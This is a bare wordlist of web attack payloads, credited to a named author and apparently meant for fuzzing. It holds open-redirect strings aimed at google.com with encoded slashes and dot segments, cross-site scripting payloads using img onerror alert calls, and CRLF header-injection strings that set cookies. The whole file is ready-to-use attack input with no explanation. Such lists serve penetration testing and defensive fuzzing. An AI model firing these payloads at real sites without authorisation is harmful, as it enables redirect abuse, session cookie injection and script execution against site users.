Credits: e3xpl0it <twitter.com/e3xpl0it>
%2Fwww%252egoogle%252ecom
%2Fwww%252egoogle%252ecom%252f
%2Fwww%2egoogle%2ecom
%ff%2Fwww%252egoogle%252ecom
%ff%2Fwww%252egoogle%252ecom%252f
//www.google.com/%2E%2E
/www.google.com/%2E%2E
/%2fwww.google.com/%2e%2e/
//////www.google.com/%2e%2e/
//www.google.com/
\/www.google.com/
\/www.google.com/
\/www.google.com/%2e%2e/
/\www.google.com/%2e%2e/
/%2fwww.google.com/%2e%2e
/%2fwww.google.com/%2e%2e/
https://www.google.com/
%0a.google.com/
www.google.com/
%0d.google.com%2f
%0d%2egoogle.com%2f
%0a%2egoogle.com%2f
%2e%5fgoogle.com%2e%5f
%2fwww.google.com/%2e%2e
%2fwww.google.com%2f%2e%2e
'+alert(xwx)+'/%2E%2E
"><img/src='x'onerror=alert(xwx)>/%2E%2E/%2E%2E/
%2Fx%2F%3cimg%2Fonerror='alert(xwx)'src=x%3e%2f.%2e%2f.%2e%2f%3f
/x/<img/onerror='alert(xwx)'src=x>/../../
%0dSet-Cookie:xxx=xwx
%0aSet-Cookie:xxx=xwx
%0d%0a%20Set-cookie:xxx=xwx
%0ASet-Cookie:xxx=xwx%0AX:xwx
%0dSet-Cookie:xxx=xwx%0AX:xwx
%0d%0ASet-Cookie:xxx=x%0AX:xwx
%0d%0A%20Set-Cookie:x=x%0AX:xwx
%E5%98%8A%E5%98%8DSet-Cookie:xxx=xwx
//www.google.com/%2E%2E%0ASet-Cookie:x=xwx
//www.google.com/%2E%2E%0d%0A%20Set-Cookie:x=xwx
//www.google.com/%2E%2E%0dSet-Cookie:x=xwx
xwx'"<>/%2e%2e
xwx'"<>/%2e%2e/
xwx'"<>
xwx%27%22%3c%3e%2e%2e
xwx%27%22%3c%3e%2e%2e/
xwx/%2e%2e
xwx/%2e%2e/
%2e%2e/xwx/
%2e%2e/xwx
